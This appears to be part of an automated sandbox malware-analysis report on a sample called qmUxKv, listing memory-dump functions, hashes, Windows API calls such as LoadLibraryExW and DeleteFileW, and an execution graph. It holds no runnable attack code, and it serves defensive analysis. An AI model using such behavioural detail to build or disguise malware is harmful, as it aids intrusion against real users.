                                                • Opcode ID: 675af2db3dd23f857a477079179d3268fc7d494d3280f5d1a55ed644ed4b7f0e
                                                • Instruction ID: 5adb3409e47fbe84c52d9d00a520cf52a0ea2ed1194efca6b782e34de031cfc0
                                                • Opcode Fuzzy Hash: 675af2db3dd23f857a477079179d3268fc7d494d3280f5d1a55ed644ed4b7f0e
                                                • Instruction Fuzzy Hash: 5DC080759053489FC740EFF8B50C7557BADD707261F044054E509C3200DF735990C691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC411D Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c57f3e57ec038d902046012de740985153380613937947224ccca356a2a8dec
                                                • Instruction ID: b5a1188971c01b868e40554708b1c41507d3f2616efad7a37cf1c19fdf155709
                                                • Opcode Fuzzy Hash: 0c57f3e57ec038d902046012de740985153380613937947224ccca356a2a8dec
                                                • Instruction Fuzzy Hash: ACD01730D025198FCB84DF64DE80A8CBBBAEF44200F10D6AAD00AA7264DA709E898F44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC3649 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a904bd954ab5bd7ca83dad0552f2d9136b732da60a307142cbd40b0cdfdfc8e8
                                                • Instruction ID: 586ebfe85729b7e2380d53b63813e56f9e1f7dca607c2366bbb81ee2d5ec95aa
                                                • Opcode Fuzzy Hash: a904bd954ab5bd7ca83dad0552f2d9136b732da60a307142cbd40b0cdfdfc8e8
                                                • Instruction Fuzzy Hash: CAC09B6CF506145FD7495E74581657628EFF7C4700F50C115D9035B3C9DC354D414EB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 06FCE000 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$[V~*$]\`
                                                • API String ID: 0-1849991408
                                                • Opcode ID: 9a634109c996ba397884741fe8c9dd204f1ab86cbd3589a6b975cac5a83a6cdc
                                                • Instruction ID: a8ce49b91a2169e7fcd97c3befde786e1d56db0bc1f4dce63aba19ac1981f57f
                                                • Opcode Fuzzy Hash: 9a634109c996ba397884741fe8c9dd204f1ab86cbd3589a6b975cac5a83a6cdc
                                                • Instruction Fuzzy Hash: 89B10671E1561ADFDB44CFAAEA8089EFBF2BF89310B14E52AD415BB214D7309901CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC14E0 Relevance: 5.2, Strings: 4, Instructions: 203COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$$^q$$^q
                                                • API String ID: 0-2454687669
                                                • Opcode ID: ef3c88aeac335c8f627a0e1d7ee8fb816e5bf6ac2caf24ee51a2187712a07875
                                                • Instruction ID: f13cb494dd74a1609073a28582a40f4706d53c8c4fe036473651248fe0261dc8
                                                • Opcode Fuzzy Hash: ef3c88aeac335c8f627a0e1d7ee8fb816e5bf6ac2caf24ee51a2187712a07875
                                                • Instruction Fuzzy Hash: 3E919B75E0011ACFCB54CFA8C680AADBBF2BF49325F15855AE452EB656C334EC90DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:181
                                                Total number of Limit Nodes:18
                                                execution_graph 41531 2ccd01c 41532 2ccd034 41531->41532 41533 2ccd08e 41532->41533 41538 641d268 41532->41538 41542 641e3b8 41532->41542 41551 641d257 41532->41551 41555 641a04c 41532->41555 41539 641d28e 41538->41539 41540 641a04c CallWindowProcW 41539->41540 41541 641d2af 41540->41541 41541->41533 41543 641e3c8 41542->41543 41544 641e429 41543->41544 41546 641e419 41543->41546 41547 641e427 41544->41547 41580 641e01c 41544->41580 41564 641e540 41546->41564 41569 641e61c 41546->41569 41575 641e550 41546->41575 41552 641d265 41551->41552 41553 641a04c CallWindowProcW 41552->41553 41554 641d2af 41553->41554 41554->41533 41558 641a057 41555->41558 41556 641e429 41557 641e01c CallWindowProcW 41556->41557 41560 641e427 41556->41560 41557->41560 41558->41556 41559 641e419 41558->41559 41561 641e540 CallWindowProcW 41559->41561 41562 641e550 CallWindowProcW 41559->41562 41563 641e61c CallWindowProcW 41559->41563 41561->41560 41562->41560 41563->41560 41566 641e54e 41564->41566 41565 641e5f0 41565->41547 41584 641e5f8 41566->41584 41588 641e608 41566->41588 41570 641e5da 41569->41570 41571 641e62a 41569->41571 41573 641e608 CallWindowProcW 41570->41573 41574 641e5f8 CallWindowProcW 41570->41574 41572 641e5f0 41572->41547 41573->41572 41574->41572 41577 641e552 41575->41577 41576 641e5f0 41576->41547 41578 641e608 CallWindowProcW 41577->41578 41579 641e5f8 CallWindowProcW 41577->41579 41578->41576 41579->41576 41581 641e027 41580->41581 41582 641f88a CallWindowProcW 41581->41582 41583 641f839 41581->41583 41582->41583 41583->41547 41585 641e608 41584->41585 41586 641e619 41585->41586 41591 641f7c0 41585->41591 41586->41565 41589 641e619 41588->41589 41590 641f7c0 CallWindowProcW 41588->41590 41589->41565 41590->41589 41592 641e01c CallWindowProcW 41591->41592 41593 641f7da 41592->41593 41593->41586 41377 641b320 41378 641b362 41377->41378 41379 641b368 LoadLibraryExW 41377->41379 41378->41379 41380 641b399 41379->41380 41381 2ea0848 41383 2ea084e 41381->41383 41382 2ea091b 41383->41382 41387 6411898 41383->41387 41391 64118a8 41383->41391 41395 2ea1390 41383->41395 41388 64118b7 41387->41388 41399 6410f84 41388->41399 41392 64118b7 41391->41392 41393 6410f84 4 API calls 41392->41393 41394 64118d8 41393->41394 41394->41383 41397 2ea139b 41395->41397 41396 2ea14b8 41396->41383 41397->41396 41516 2ea7528 41397->41516 41400 6410f8f 41399->41400 41403 6412764 41400->41403 41402 641325e 41402->41402 41404 641276f 41403->41404 41405 6413984 41404->41405 41408 6415606 41404->41408 41412 6415608 41404->41412 41405->41402 41409 6415608 41408->41409 41410 641564d 41409->41410 41416 64157b8 41409->41416 41410->41405 41413 6415629 41412->41413 41414 641564d 41413->41414 41415 64157b8 4 API calls 41413->41415 41414->41405 41415->41414 41419 64157c5 41416->41419 41417 64157fe 41417->41410 41419->41417 41420 6413748 41419->41420 41421 6413753 41420->41421 41423 6415870 41421->41423 41424 64149f4 41421->41424 41423->41423 41425 64149ff 41424->41425 41431 6414a04 41425->41431 41427 64158df 41435 641abe8 41427->41435 41443 641ac00 41427->41443 41428 6415919 41428->41423 41434 6414a0f 41431->41434 41432 6416b68 41432->41427 41433 6415608 4 API calls 41433->41432 41434->41432 41434->41433 41437 641ac00 41435->41437 41436 641ac3d 41436->41428 41437->41436 41452 641ae76 41437->41452 41457 641ae78 41437->41457 41438 641ac7d 41461 641c169 41438->41461 41470 641c178 41438->41470 41445 641ac31 41443->41445 41447 641ad31 41443->41447 41444 641ac3d 41444->41428 41445->41444 41448 641ae76 3 API calls 41445->41448 41449 641ae78 3 API calls 41445->41449 41446 641ac7d 41450 641c169 2 API calls 41446->41450 41451 641c178 2 API calls 41446->41451 41447->41428 41448->41446 41449->41446 41450->41447 41451->41447 41453 641ae78 41452->41453 41479 641aeb8 41453->41479 41488 641aec8 41453->41488 41454 641ae82 41454->41438 41459 641aec8 2 API calls 41457->41459 41460 641aeb8 2 API calls 41457->41460 41458 641ae82 41458->41438 41459->41458 41460->41458 41462 641c178 41461->41462 41497 641c6d0 41462->41497 41502 641c6e0 41462->41502 41463 641c226 41464 6419e68 GetModuleHandleW 41463->41464 41466 641c252 41463->41466 41465 641c296 41464->41465 41469 641d065 CreateWindowExW 41465->41469 41469->41466 41471 641c1a3 41470->41471 41476 641c6d0 GetModuleHandleW 41471->41476 41477 641c6e0 GetModuleHandleW 41471->41477 41472 641c226 41475 641c252 41472->41475 41507 6419e68 41472->41507 41476->41472 41477->41472 41480 641aebd 41479->41480 41481 6419e68 GetModuleHandleW 41480->41481 41483 641aefc 41480->41483 41482 641aee4 41481->41482 41482->41483 41487 641b15d GetModuleHandleW 41482->41487 41483->41454 41484 641b100 GetModuleHandleW 41486 641b12d 41484->41486 41485 641aef4 41485->41483 41485->41484 41486->41454 41487->41485 41489 641aed9 41488->41489 41492 641aefc 41488->41492 41490 6419e68 GetModuleHandleW 41489->41490 41491 641aee4 41490->41491 41491->41492 41496 641b15d GetModuleHandleW 41491->41496 41492->41454 41493 641b100 GetModuleHandleW 41495 641b12d 41493->41495 41494 641aef4 41494->41492 41494->41493 41495->41454 41496->41494 41498 641c6e0 41497->41498 41499 641c78e 41498->41499 41500 641c840 GetModuleHandleW 41498->41500 41501 641c850 GetModuleHandleW 41498->41501 41500->41499 41501->41499 41503 641c70d 41502->41503 41504 641c78e 41503->41504 41505 641c840 GetModuleHandleW 41503->41505 41506 641c850 GetModuleHandleW 41503->41506 41505->41504 41506->41504 41509 641b0b8 GetModuleHandleW 41507->41509 41510 641b12d 41509->41510 41511 641d065 41510->41511 41512 641d069 41511->41512 41513 641d09d CreateWindowExW 41511->41513 41512->41475 41515 641d1d4 41513->41515 41517 2ea7532 41516->41517 41518 2ea754c 41517->41518 41521 642d80f 41517->41521 41526 642d820 41517->41526 41518->41397 41523 642d81a 41521->41523 41522 642da4a 41522->41518 41523->41522 41524 642da60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41523->41524 41525 642da70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41523->41525 41524->41523 41525->41523 41528 642d835 41526->41528 41527 642da4a 41527->41518 41528->41527 41529 642da60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41528->41529 41530 642da70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41528->41530 41529->41528 41530->41528 41594 6412bf8 DuplicateHandle 41595 6412c8e 41594->41595 41596 2ea7350 41597 2ea7396 DeleteFileW 41596->41597 41599 2ea73cf 41597->41599

                                                Executed Functions

                                                Function 0641AEC8 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 536cee5bb6ccff38483e0741755317d6ddd7cb4ad1b574573328ddd6ef371f15
                                                • Instruction ID: b84eba88b5e0bbc4d6ffd01a60e52b582cfa87db9cbd554cf3aaf99247ec2f35
                                                • Opcode Fuzzy Hash: 536cee5bb6ccff38483e0741755317d6ddd7cb4ad1b574573328ddd6ef371f15
                                                • Instruction Fuzzy Hash: 30813570A00B048FD765CF2AD54475ABBF2FF88200F108A2EE49ACBB50D735E945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0641D065 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641D1C2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: b74282260572838dcffdf77f8c1f22c0b1d4f461eb6ac5fe9d49c94a45ab8f03
                                                • Instruction ID: a538c20014b8a3cc1fdf5c30b31f3ef9eaaa3affdd78f1f265cd52e6aee9c13a
                                                • Opcode Fuzzy Hash: b74282260572838dcffdf77f8c1f22c0b1d4f461eb6ac5fe9d49c94a45ab8f03
                                                • Instruction Fuzzy Hash: E351DFB1C00349AFDF15CFA9C984ADEBFB5BF49314F24816AE818AB220D7719855CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0642E638 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2976325097.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6420000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 940e437dd5cdd8adad5f39b363dae77383f6b9867432713f88cda76268685fdb
                                                • Instruction ID: 30a3129ccfb1b9019baeda1ac244def34d85cd3b640ca27f5e2703b11bf95bc2
                                                • Opcode Fuzzy Hash: 940e437dd5cdd8adad5f39b363dae77383f6b9867432713f88cda76268685fdb
                                                • Instruction Fuzzy Hash: CF414672D043A68FCB14DFB9C8442AEBFF5AF89210F1585ABD414A7391EB34A841CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0641D0A4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641D1C2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 96f934fe2561241b0b46a1c600778eeb54d925ef73f97aee66a82b950f718a94
                                                • Instruction ID: b08487705cfb2c70da67592ec5ceaadf5bc937466dc9cc6775724a6b5fa04f11
                                                • Opcode Fuzzy Hash: 96f934fe2561241b0b46a1c600778eeb54d925ef73f97aee66a82b950f718a94
                                                • Instruction Fuzzy Hash: 6851C2B1D00349DFDB14CF99C984ADEBFB5BF49314F24852AE419AB210D7719845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0641D0B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641D1C2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 728b3ee4ebb57b974971c6a135e0cfc1c2cbb681aa13fd1578ccbf0893ec4233
                                                • Instruction ID: ddaf85004c5c89dd1039a6c409dda9199af702c3b3b8806a40b018ad50c07e6e
                                                • Opcode Fuzzy Hash: 728b3ee4ebb57b974971c6a135e0cfc1c2cbb681aa13fd1578ccbf0893ec4233
                                                • Instruction Fuzzy Hash: 7841B0B1D10309DFDB14CF99C984ADEBFB5BF48310F24852AE819AB210D7759885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0641E01C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0641F8B1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: b9ba61c592cafe3fd97827f98eba030b8394e14558063cbade4b8614dc800a86
                                                • Instruction ID: bc0e2d3bf14c92bff0db3ee06ab286da97a6f78cb4358290ecde77e52733511c
                                                • Opcode Fuzzy Hash: b9ba61c592cafe3fd97827f98eba030b8394e14558063cbade4b8614dc800a86
                                                • Instruction Fuzzy Hash: D5412AB5A00305DFDB54CF5AC848AAABBF5FB88314F24C559D519AB321D734A846CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06412BF0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06412C7F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 9f7d8ff6862a44aae22c89ee5e48489a91957d4d754daec5ebaea2084ef99088
                                                • Instruction ID: 8d07b4941ddc7cdb5429201505d962f8dcf657cdeb4908ef925a486a4853ebc1
                                                • Opcode Fuzzy Hash: 9f7d8ff6862a44aae22c89ee5e48489a91957d4d754daec5ebaea2084ef99088
                                                • Instruction Fuzzy Hash: 4021E3B5D002589FDB10CFAAD984ADEBBF8EB48310F14801AE958A7320D374A950CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06412BF8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06412C7F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4e9d3595de791622ac480c821d6e323916aa3fe54d7b7e1433e50788bfae2562
                                                • Instruction ID: 2f0f3c95e32aa8596408db1906b8ab06268daff90869540b58f8d3b72ff40490
                                                • Opcode Fuzzy Hash: 4e9d3595de791622ac480c821d6e323916aa3fe54d7b7e1433e50788bfae2562
                                                • Instruction Fuzzy Hash: 1821E2B5D003189FDB10CFAAD984ADEBBF8EB48320F14801AE918A7310D374A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EA7348 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 02EA73C0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2932017052.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ea0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 86b7c0e6def2975e23fb795343e46f85bc6acee61e2fc1504d07b9631477feb0
                                                • Instruction ID: e175d0112ae54c6a3e34337eac9122309a93f89dbfa4b13b164041b2dba26b28
                                                • Opcode Fuzzy Hash: 86b7c0e6def2975e23fb795343e46f85bc6acee61e2fc1504d07b9631477feb0
                                                • Instruction Fuzzy Hash: 832147B1C0065A8BCB10CFAAC545BEEFBB0BF48324F15816AD858B7650D338A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EA7350 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 02EA73C0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2932017052.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ea0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 40e2c7755906bdaa0a5dca33b4a39d1e7b2395a28214e8f408e131f889505b15
                                                • Instruction ID: e80c00bdc862635911165fad1634f18507c0898eb8df3194bc37941af07bba9f
                                                • Opcode Fuzzy Hash: 40e2c7755906bdaa0a5dca33b4a39d1e7b2395a28214e8f408e131f889505b15
                                                • Instruction Fuzzy Hash: 761133B1C0061A9BCB10CF9AC545B9EFBB4BF48324F11812AD858A7250D338A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0641B319 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641B38A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5921244d0428f8d5c3cc4935a794f690d2fe0ffe42a99b5009c9314ff162a3a9
                                                • Instruction ID: f5c7725002925624b2dadc2fa9802978d7bf9251acdca55cd0e5f00e67c278db
                                                • Opcode Fuzzy Hash: 5921244d0428f8d5c3cc4935a794f690d2fe0ffe42a99b5009c9314ff162a3a9
                                                • Instruction Fuzzy Hash: B011F6B6D003199FDB14CFAAD844ADEFFF4EB49310F10842AE459AB610C375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0642DE54 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642E68A), ref: 0642E777
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2976325097.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6420000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 415e2d2e8dba87a2d2e6439afb47c22683664601facba2fed1b853c970ae83d2
                                                • Instruction ID: b0a53195e59ec4cd7382851970104a10ae5fd01e92f856fb8e51e4c0266d212c
                                                • Opcode Fuzzy Hash: 415e2d2e8dba87a2d2e6439afb47c22683664601facba2fed1b853c970ae83d2
                                                • Instruction Fuzzy Hash: CA1106B1C0066A9BCB10DF9AC44479EFBF4AB48320F10856AD418B7251D378A950CFE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0642E708 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642E68A), ref: 0642E777
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2976325097.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6420000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: b4d06fbf24ff88bb9946407ae11c9cb2ce926071909f07e5aff5c99dd143353a
                                                • Instruction ID: 9688eda89170871e5a968b17a965db99db1699af6cdcd68661e80dc89f4f9c80
                                                • Opcode Fuzzy Hash: b4d06fbf24ff88bb9946407ae11c9cb2ce926071909f07e5aff5c99dd143353a
                                                • Instruction Fuzzy Hash: 8E1103B1C00269DFCB10DF9AD4447DEFBF4AB48320F24816AD818A7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0641B320 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641B38A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: be35a5c015927dceeead22d90aebbcba1f563888ecbc6bfe82d403a39b2b4b00
                                                • Instruction ID: 1c29904cf5993703a84564cd052a7ef0106d2e5f92bf8cef1e0b8fe884a789b0
                                                • Opcode Fuzzy Hash: be35a5c015927dceeead22d90aebbcba1f563888ecbc6bfe82d403a39b2b4b00
                                                • Instruction Fuzzy Hash: CB1104B6D003098FDB10CF9AC444ADEFBF4EB48310F10842AD459AB710C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06419E68 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0641AEE4), ref: 0641B11E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 7bd7868cc8c13335226613be0b4389e122e44bf8c8bd53cc78dbd2a93bf8d778
                                                • Instruction ID: c271073dda3fe88b7df0750f22b32e443792c881f1268b1044a1c4bb224a8bc4
                                                • Opcode Fuzzy Hash: 7bd7868cc8c13335226613be0b4389e122e44bf8c8bd53cc78dbd2a93bf8d778
                                                • Instruction Fuzzy Hash: 0E1132B6C00708CFCB10CF9AC844ADEFBF4EB48324F10806AD828AB210C374A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02CCD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2930992363.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ccd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 623292acd84253c1a692b65d6d4be4552cc5bee4f6c95cddd53d4ae2664ca267
                                                • Instruction ID: 71a88004a22997d45ffe32e6b196ae774d5d2e7a0cb195e313ad0a517f765831
                                                • Opcode Fuzzy Hash: 623292acd84253c1a692b65d6d4be4552cc5bee4f6c95cddd53d4ae2664ca267
                                                • Instruction Fuzzy Hash: 3621D071604200DFDB14DF18D9C4B26BBA5EB84324F30C5BDE84A4B256C33AD447CAA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02CCD005 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2930992363.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ccd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfafa1755a44e66ad6834d34df74442a54311f690d1e7b6674f5454ed940529c
                                                • Instruction ID: 06bb1eb68919bddc4df34b30c7088be356ffd752b657b277bcda5877b36162ab
                                                • Opcode Fuzzy Hash: dfafa1755a44e66ad6834d34df74442a54311f690d1e7b6674f5454ed940529c
                                                • Instruction Fuzzy Hash: 3B2195755093C08FD702CF24D594715BF71EB86214F28C5EED8498F6A7C33A940ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.1%
                                                Dynamic/Decrypted Code Coverage:100%
